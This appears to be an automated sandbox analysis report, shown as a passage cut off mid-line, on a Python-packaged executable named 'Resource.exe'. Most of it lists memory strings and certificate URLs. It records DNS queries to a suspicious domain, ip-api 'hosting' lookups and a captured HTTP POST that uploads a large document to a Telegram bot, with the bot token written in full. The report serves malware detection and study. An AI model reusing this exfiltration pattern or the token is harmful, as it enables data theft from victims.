Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp

String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: blank-63z6o.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6723507541:AAFus4a_vfOH23XVGo8SFLxAeDedGw1G3vk/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 757011User-Agent: python-urllib3/2.1.0Content-Type: multipart/form-data; boundary=4f135cb48c13ab6db74f60ce4e8d2c0e

Source: Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F50000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F51000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F50000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F51000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Resource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473117545.0000020AB3C3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182427502.0000020AB3C3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3C3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472629307.0000020AB39A4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2162875077.0000020AB3C3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473894585.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2194288355.000001CEC3770000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2349979588.000001B7ED69A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F50000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F51000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _hashlib.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: Resource.exe, 00000001.00000003.2029000040.0000020AB381C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472335398.0000020AB3636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: Resource.exe, 00000001.00000002.2472518311.0000020AB36C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr~
Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
Source: powershell.exe, 0000000E.00000002.2266669419.000001CED38F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D6EED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E573D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Resource.exe, 00000000.00000003.2487969970.00000203A2F3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000002.2488588175.00000203A2F3E000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F50000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F51000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F50000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F51000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 